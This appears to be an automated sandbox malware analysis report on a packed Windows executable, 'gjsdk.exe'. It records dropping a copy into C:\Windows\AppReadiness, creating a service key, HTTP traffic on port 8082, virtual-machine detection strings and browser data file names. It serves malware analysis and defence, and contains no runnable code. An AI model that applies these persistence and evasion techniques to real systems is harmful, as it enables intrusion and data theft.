Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanagersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior

Source: gjsdk.exe

Static file information: File size 12120576 > 1048576

Source: gjsdk.exe

Static PE information: Raw size of UPX1 is bigger than: 0x100000 < 0xb8ee00

Source: gjsdk.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

PE file contains sections with non-standard names

Source: gjsdk.exe

Static PE information: section name: UPX2

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: unknown

Executable created and started: C:\Windows\AppReadiness\mmzwi.exe

Drops PE files to the windows directory (C:\Windows)

Source: C:\Users\user\Desktop\gjsdk.exe

PE file moved: C:\Windows\AppReadiness\mmzwi.exe

Jump to behavior

Creates or modifies windows services

Source: C:\Users\user\Desktop\gjsdk.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\partmgr

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49953

Source: C:\Users\user\Desktop\gjsdk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX			Jump to behavior

Source: gjsdk.exe, 00000000.00000002.1747251241.000000C000160000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: KVMKVMKVMKVMGetFileTimeGetFileTypeMicrosoft HvFORMAIFFGetFullPathNameWGetLastErrorGetLogicalDrivesGetLongPathNameWGetNamedPipeInfoGetPriorityClassGetProcAddressGetProcessIdFORMAIFFVMwareVMwareGetProcessTimesXenVMMXenVMMbhyve bhyve GetStartupInfoWaudio/ai
Source: mmzwi.exe, 00000002.00000002.2955357792.0000000002441000.00000040.00000001.01000000.00000005.sdmp	Binary or memory string: <br/></ul>tbodytheadtfootstdinwhoisIPSecimap4rsyncsteamSkypeWhoIsNETSCXeroxMAILQVMNETUnifybhfhsFXP-1bhmdsVSLMPRTSPSbh611decapOnmuxArielSMPTEdsfgwalpesSMTPSss7nsaviandantzxvttpsnaretalkdripnguucpdkrcmdchcmddemonsonarVEMMIginadRUSHDnetGWrfilephoneKIOSKJSTELOBRPDROOTDIPCD3HuskyRxMonFTSRVMIMERBytexShiva3l-l1WinDDMSIMSradiocvmoncnhrpcft-0cft-1cft-2cft-3cft-4cft-5cft-6cft-7helloMMPFTSPICESlushCacheglobetroffrimslDSATPNETMLSNAPPdbrefRSMTPOrionvenusTOP/XTSILBspockWillyWinDbIPASSbruceSolveSonuswkarsqotpsAlarmUADTCaurisAISESaaftprmlnkPDnetREBOLqsoftICPv24TalkPlatoE-NetMySQLBBARSCSMS2jt400MS-LAITOSESariseMuleMCNTPA1-BSICMPDCVSupSSDTPProEdCDDBPWebSMqueuepokerIRISAHivePTrackBINKPquakeKuangyamux[E]: /hostES256ES384ES512EdDSAHS256HS384HS512RS256RS384RS512PS256PS384PS512%s=%qc(%s)
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000394000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: IDEAFARM-CATCH / NetDevil trojanVMware Authentication Daemon
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000368000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware Web Access
Source: gjsdk.exe, 00000000.00000002.1742065604.0000000002441000.00000040.00000001.01000000.00000005.sdmp, mmzwi.exe, 00000002.00000002.2955357792.0000000002441000.00000040.00000001.01000000.00000005.sdmp, mmzwi.exe, 00000002.00000001.1731920546.00000000024DE000.00000040.00000001.01000000.00000005.sdmp	Binary or memory string: QeMUY6J
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000394000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware Authentication Daemon / IDEAFARM-CHAT
Source: gjsdk.exe, 00000000.00000002.1742065604.0000000002441000.00000040.00000001.01000000.00000005.sdmp, mmzwi.exe, 00000002.00000002.2955357792.0000000002441000.00000040.00000001.01000000.00000005.sdmp, mmzwi.exe, 00000002.00000001.1731920546.00000000024BF000.00000040.00000001.01000000.00000005.sdmp	Binary or memory string: ijfV6o2HGfS
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C0002CC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: places.sqliteplaces.sqliteClearCommError192.168.2.203192.168.2.204CloseHandleplaces.sqliteextensions.jsonConnectNamedPipeCreateDirectoryWCreateEventExWCreateEventWCreateFileWCreateHardLinkWCreateJobObjectWunsupported itemunsupported itemCreateMutexExWCreateMutexWparse error192.168.2.205CreateNamedPipeWCreatePipeCreateProcessW192.168.2.206192.168.2.207192.168.2.208AMDisbetter!DefineDosDeviceWDeleteFileWDeviceIoControlAuthenticAMDCentaurHaulsGenuineIntel192.168.2.209DuplicateHandleExitProcessFindCloseFindFirstFileWFindFirstVolumeWFindNextFileWFindNextVolumeWFindResourceWFindVolumeCloseFlushFileBuffersFlushViewOfFileFormatMessageWFreeLibraryGetCommStateGetCommTimeoutsGetCommandLineW192.168.2.210TransmetaCPUGetComputerNameW192.168.2.211192.168.2.212GetConsoleCPGetConsoleModeGenuineTMx86Geode by NSCVIA VIA VIA 192.168.2.213192.168.2.214KVMKVMKVMKVMGetDriveTypeWMicrosoft Hv192.168.2.215GetFileTimeGetFileType192.168.2.216VMwareVMwareGetFullPathNameWGetLastErrorGetLogicalDrivesGetLongPathNameWGetNamedPipeInfoGetPriorityClassGetProcAddressGetProcessIdXenVMMXenVMMbhyve bhyve GetProcessTimes192.168.2.217192.168.2.218GetStartupInfoWHygonGenuineVortex86 SoCGetStdHandleSiS SiS SiS 192.168.2.219GetTempPathWGetTickCount64192.168.2.220RiseRiseRiseGetVersionGenuine RDC192.168.2.221192.168.2.222192.168.2.223192.168.2.224192.168.2.225IsWow64ProcessIsWow64Process2LoadLibraryExW192.168.2.226192.168.2.227LoadLibraryWLoadResourceLocalAllocLocalFreeLockFileExLockResourceMapViewOfFile192.168.2.228192.168.2.229Module32FirstW192.168.2.230192.168.2.231Module32NextW192.168.2.232192.168.2.233MoveFileExWGenuineIntel192.168.2.234MoveFileWOpenEventW192.168.2.235192.168.2.236OpenMutexWOpenProcessOpenThread192.168.2.237192.168.2.238Process32FirstWProcess32NextWPulseEventPurgeComm192.168.2.239Did you mean %q?QueryDosDeviceWReadConsReadFile ,,ReadConsoleWReleaseMutexW192.168.2.240192.168.2.241RemoveDirectoryWResetEventResumeThreadSetCommBreakSetCommMask192.168.2.242192.168.2.243SetCommStateshow help]192.168.2.244SetCommTimeoutsSetConsoleCPSetConsoleMode192.168.2.245[command]192.168.2.246192.168.2.247SetDllDirectoryW[command]192.168.2.248SetEndOfFileSetEnvirSetEvent192.168.2.249SetErrorModetestdata/fuzz
Source: mmzwi.exe, 00000002.00000002.2955357792.0000000002441000.00000040.00000001.01000000.00000005.sdmp	Binary or memory string: rlogindhcpv6vmwareradiuscpanelTelnetNI FTPGophervettcpFingerSUPDUPISO-IPJargonXyplexDirectrescapZannetHassleUTMPSDUTMPCDcomscmskronkMondexulpnetISAKMPPassGogdomapwhoamiudemonrepcmdSANityAminetRepCmdSun DRMeCommAgentXnloginquotadomservsubmitentombwpagesdevicevsinetmaitrdbusboynimregCARDAXPROOFDMurrayDNS2Gohermesudt_osDBStarTabulaPEportrfx-lmoracleisi-lm3ds-lmsna-csorbixdontimekermitrrirtrrrimwmrrilwmrrifmmrrisatcentraimperacaicciwinddxroketzproximencorepsmondRADIUSMyrtlecsoft1TALNETarmadptekplsmpnjscUniSQLsearchcdfuncsdfuncNBX CCNBX AUComcamAVENUEDOCENTRECIPeCVMMONpehelpsdhelpfcmsysFutrixWusageG-TalkGROOVEBMC ARDIRGISfjmpssREFTEKlabratDeliboCECSVCnetrekAMInetTragicOLHOSTtqdataRaven1Raven2aic-npcspuniatmtcpka0wucsilkp1silkp2silkp3silkp4glishddaishiEpiconROBOERJAMCT5JAMCT6SignalZARKOVBOSCAPITB301vsixmldi-asegds_dbTL1-LVVMODEMadmindSYSOPTfg-fpsfg-gippdrncsVNSSTRWebTIESUITJDDJ ILMSAVANTPharosN1-FWPActNetDJ-ICEA1-MSCEWCTSPxdsxdmJMACT3jmevt2iRDMI2PatrolLM DtaabarsdtruecmrasadvPalaceBlockshp-scohp-scaAsylummed-cipolicysha256deleteKOI8-RKOI8-U_count^(?i)(_blue__cyan_inverthiddenfinishack:%dIgnoreUTF-16[%d]%s
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C0002CC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: gjsdk.exe, 00000000.00000002.1750980942.000002B0E4744000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: mmzwi.exe, 00000002.00000002.2966741709.000001F8FE57C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN

Source: C:\Users\user\Desktop\gjsdk.exe

Process information queried: ProcessInformation

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\gjsdk.exe	Queries volume information: C:\Users\user\Desktop\gjsdk.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gjsdk.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\Windows\AppReadiness\mmzwi.exe VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\gjsdk.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

ID:	1529334
Product:	CloudBasic
Start time:	21:29:36
Start date:	08.10.2024
Sample:	gjsdk.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	0537541bc5c5e92570375c1178f6b8c0
SHA1:	041c02dbab31e9521f865f7e1783314364a93ec2
SHA256:	f38d1ee353a3c7f45a20a67b46bed65c4312fc24d7dcb761d800c8003d8d10e5
Filetype:	Win64 Executable Console (202006/5) 81.26%

Windows Analysis Report
gjsdk.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report gjsdk.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
gjsdk.exe